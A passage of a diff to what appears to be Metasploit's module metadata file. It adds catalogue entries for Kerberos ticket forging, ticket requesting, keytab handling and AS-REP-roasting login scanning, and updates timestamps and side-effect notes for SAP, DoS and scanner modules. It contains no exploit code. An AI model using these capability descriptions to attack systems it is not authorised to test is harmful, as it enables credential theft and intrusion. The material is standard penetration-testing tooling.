-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb",
    "is_install_path": true,
    "ref_name": "admin/http/zyxel_admin_password_extractor",
@@ -5144,6 +5221,213 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/kerberos/forge_ticket": {
+    "name": "Kerberos Silver/Golden Ticket Forging",
+    "fullname": "auxiliary/admin/kerberos/forge_ticket",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Benjamin Delpy",
+      "Dean Welch"
+    ],
+    "description": "This module forges a Kerberos ticket",
+    "references": [
+      "URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-01-24 13:28:10 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/forge_ticket",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "AKA": [
+        "Silver Ticket",
+        "Golden Ticket",
+        "Ticketer",
+        "Klist"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/kerberos/get_ticket": {
+    "name": "Kerberos TGT/TGS Ticket Requester",
+    "fullname": "auxiliary/admin/kerberos/get_ticket",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Christophe De La Fuente",
+      "Spencer McIntyre",
+      "Will Schroeder",
+      "Lee Christensen",
+      "Oliver Lyak",
+      "smashery"
+    ],
+    "description": "This module requests TGT/TGS Kerberos tickets from the KDC",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 88,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-01-24 15:12:00 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/get_ticket",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "getTGT",
+        "getST"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/kerberos/inspect_ticket": {
+    "name": "Kerberos Ticket Inspecting",
+    "fullname": "auxiliary/admin/kerberos/inspect_ticket",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Dean Welch"
+    ],
+    "description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n          decrypts and displays the encrypted content too.\n          Can be used for inspecting tickets that aren't working as intended in an effort to debug them.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-01-26 09:21:55 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/inspect_ticket",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "AKA": [
+        "klist"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/kerberos/keytab": {
+    "name": "Kerberos keytab utilities",
+    "fullname": "auxiliary/admin/kerberos/keytab",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n          more principals.\n\n          Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n          offline.\n\n          Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n          including the krbtgt encrypted blobs if the AES password hash is used.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-12-07 23:03:57 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/keytab.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/keytab",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
    "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
    "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
@@ -5178,7 +5462,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-08 11:35:31 +0000",
+    "mod_time": "2023-01-27 09:11:43 +0000",
    "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -5190,6 +5474,58 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/kerberos/ticket_converter": {
+    "name": "Kerberos ticket converter",
+    "fullname": "auxiliary/admin/kerberos/ticket_converter",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Zer1t0",
+      "Dean Welch"
+    ],
+    "description": "This module converts tickets to the ccache format from the kirbi format and vice versa.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py",
+      "URL-https://tools.ietf.org/html/rfc4120",
+      "URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html",
+      "URL-https://github.com/gentilkiwi/kekeo",
+      "URL-https://github.com/rvazarkar/KrbCredExport"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-09-28 22:28:54 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/ticket_converter",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/ldap/rbcd": {
    "name": "Role Base Constrained Delegation",
    "fullname": "auxiliary/admin/ldap/rbcd",
@@ -6000,7 +6336,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2021-04-22 10:15:04 +0000",
+    "mod_time": "2022-06-29 12:20:37 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_idf",
@@ -6379,7 +6715,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-02-16 13:56:50 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/networking/arista_config.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/arista_config",
@@ -6387,6 +6723,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -6706,7 +7051,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass",
@@ -6714,6 +7059,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -6744,7 +7099,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-05-13 04:01:03 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/networking/f5_config.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/f5_config",
@@ -6752,6 +7107,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -6782,7 +7146,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/networking/juniper_config.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/juniper_config",
@@ -6790,6 +7154,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -6820,7 +7193,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/networking/mikrotik_config.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/mikrotik_config",
@@ -6828,6 +7201,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -6905,7 +7287,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-12-07 11:02:10 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/networking/vyos_config.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/vyos_config",
@@ -6913,6 +7295,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -7619,7 +8010,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb",
    "is_install_path": true,
    "ref_name": "admin/sap/cve_2020_6207_solman_rce",
@@ -7627,6 +8018,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -7671,7 +8072,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb",
    "is_install_path": true,
    "ref_name": "admin/sap/cve_2020_6287_ws_add_user",
@@ -7681,6 +8082,16 @@
    "notes": {
      "AKA": [
        "RECON"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": false,
@@ -7749,7 +8160,7 @@
      "Yvan Genuer",
      "Vladimir Ivanov"
    ],
-    "description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n            of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n            vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n            submitting a POST request to the XMLCHART page to generate a new chart.\n\n            Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n            from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers\n            can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n            SAP IGS server.",
+    "description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n          of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n          vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n          submitting a POST request to the XMLCHART page to generate a new chart.\n\n          Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n          from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers\n          can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n          SAP IGS server.",
    "references": [
      "CVE-2018-2392",
      "CVE-2018-2393",
@@ -7774,7 +8185,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-05-13 04:01:03 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb",
    "is_install_path": true,
    "ref_name": "admin/sap/sap_igs_xmlchart_xxe",
@@ -7782,6 +8193,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -10900,7 +11320,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tsig_badtime",
@@ -10908,6 +11328,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -11313,7 +11742,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-05-13 04:01:03 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/cable_haunt_websocket_dos",
@@ -11321,6 +11750,15 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -12661,7 +13099,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-12-09 17:20:13 +0000",
+    "mod_time": "2023-02-05 12:04:59 +0000",
    "path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/mirageos/qubes_mirage_firewall_dos",
@@ -12673,11 +13111,10 @@
        "crash-service-down"
      ],
      "Reliability": [
-        "ioc-in-logs",
-        "physical-effects"
+
      ],
      "SideEffects": [
-        "unreliable-session"
+        "ioc-in-logs"
      ]
    },
    "session_types": false,
@@ -18598,7 +19035,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-05-17 17:04:49 +0000",
+    "mod_time": "2023-01-17 18:59:12 +0000",
    "path": "/modules/auxiliary/gather/get_user_spns.py",
    "is_install_path": true,
    "ref_name": "gather/get_user_spns",
@@ -19595,7 +20032,8 @@
    "type": "auxiliary",
    "author": [
      "Matt Byrne <attackdebris@gmail.com>",
-      "alanfoster"
+      "alanfoster",
+      "sjanusz-r7"
    ],
    "description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n          the different responses returned by the service for valid and invalid users.",
    "references": [
@@ -19611,12 +20049,12 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-08 18:45:03 +0000",
+    "mod_time": "2022-05-27 13:34:10 +0000",
    "path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
    "is_install_path": true,
    "ref_name": "gather/kerberos_enumusers",
    "check": false,
-    "post_auth": false,
+    "post_auth": true,
    "default_credential": false,
    "notes": {
    },
@@ -19827,7 +20265,7 @@
    "author": [
      "Grant Willcox"
    ],
-    "description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n          a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n          file containing custom queries to be executed using the RUN_QUERY_FILE action.\n          If this action is specified, then QUERY_FILE_PATH must be a path to the location\n          of this JSON/YAML file on disk.\n\n          Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n          the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n          to a comma seperated string containing the list of attributes they are interested in obtaining\n          from the results.\n\n          As a third option can run one of several predefined queries by setting ACTION to the\n          appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n          located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n          All results will be returned to the user in table, CSV or JSON format, depending on the value\n          of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n          should multiple items exist within a single column.",
+    "description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n          a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n          file containing custom queries to be executed using the RUN_QUERY_FILE action.\n          If this action is specified, then QUERY_FILE_PATH must be a path to the location\n          of this JSON/YAML file on disk.\n\n          Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n          the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n          to a comma separated string containing the list of attributes they are interested in obtaining\n          from the results.\n\n          As a third option can run one of several predefined queries by setting ACTION to the\n          appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n          located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n          All results will be returned to the user in table, CSV or JSON format, depending on the value\n          of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n          should multiple items exist within a single column.",
    "references": [

    ],
@@ -19841,7 +20279,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-12-04 17:41:24 +0000",
+    "mod_time": "2023-01-24 11:23:28 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -20742,7 +21180,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/gather/peplink_bauth_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/peplink_bauth_sqli",
@@ -20750,6 +21188,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -21065,7 +21512,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-06-04 10:22:42 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/gather/redis_extractor.rb",
    "is_install_path": true,
    "ref_name": "gather/redis_extractor",
@@ -21073,6 +21520,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -21150,7 +21606,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-04-30 23:26:18 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/gather/saltstack_salt_root_key.rb",
    "is_install_path": true,
    "ref_name": "gather/saltstack_salt_root_key",
@@ -21163,6 +21619,9 @@
      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": false,
@@ -21367,7 +21826,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/gather/shodan_host.rb",
    "is_install_path": true,
    "ref_name": "gather/shodan_host",
@@ -21375,6 +21834,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -21734,7 +22202,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/vbulletin_getindexablecontent_sqli",
@@ -21742,6 +22210,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -21918,7 +22395,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-13 10:13:27 +0000",
+    "mod_time": "2022-12-07 23:03:57 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -22403,7 +22880,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/gather/zookeeper_info_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/zookeeper_info_disclosure",
@@ -22411,6 +22888,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -31384,7 +31870,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/limesurvey_zip_traversals",
@@ -31392,6 +31878,15 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -32845,7 +33340,8 @@
      "OSVDB-877",
      "BID-11604",
      "BID-9506",
-      "BID-9561"
+      "BID-9561",
+      "URL-https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS"
    ],
    "platform": "",
    "arch": "",
@@ -32866,7 +33362,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-01-15 06:37:11 +0000",
    "path": "/modules/auxiliary/scanner/http/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/options",
@@ -34670,7 +35166,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/scanner/http/springcloud_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/springcloud_directory_traversal",
@@ -34678,6 +35174,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -35369,7 +35874,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/synology_forget_passwd_user_enum",
@@ -35377,6 +35882,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "account-lockouts",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -37255,7 +37770,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_duplicator_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_duplicator_file_read",
@@ -37263,6 +37778,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -38344,7 +38868,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenload_balancer_traversal",
@@ -38352,6 +38876,15 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -38772,6 +39305,54 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/kerberos/kerberos_login": {
+    "name": "Kerberos Authentication Check Scanner",
+    "fullname": "auxiliary/scanner/kerberos/kerberos_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "This module will test Kerberos logins on a range of machines and\n          report successful logins.  If you have loaded a database plugin\n          and connected to a database this module will record successful\n          logins and hosts so you can track your access.\n\n          Kerberos accounts which do not require pre-authentication will\n          have the TGT logged for offline cracking, this technique is known as AS-REP Roasting.\n\n          It is also able to identify whether user accounts are enabled or\n          disabled/locked out.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 88,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-12-14 18:28:16 +0000",
+    "path": "/modules/auxiliary/scanner/kerberos/kerberos_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/kerberos/kerberos_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "account-lockouts",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/llmnr/query": {
    "name": "LLMNR Query",
    "fullname": "auxiliary/scanner/llmnr/query",
@@ -40288,7 +40869,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
@@ -45616,7 +46197,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/modbus_banner_grabbing",
@@ -45624,6 +46205,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -46440,7 +47030,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-09 11:23:26 +0000",
+    "mod_time": "2023-01-13 17:31:02 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -46564,7 +47154,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -46746,7 +47336,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-12 09:29:53 +0000",
+    "mod_time": "2023-01-25 13:58:29 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -50083,7 +50673,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-01-28 10:35:25 +0000",
+    "mod_time": "2022-11-30 11:32:23 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
    "is_install_path": true,
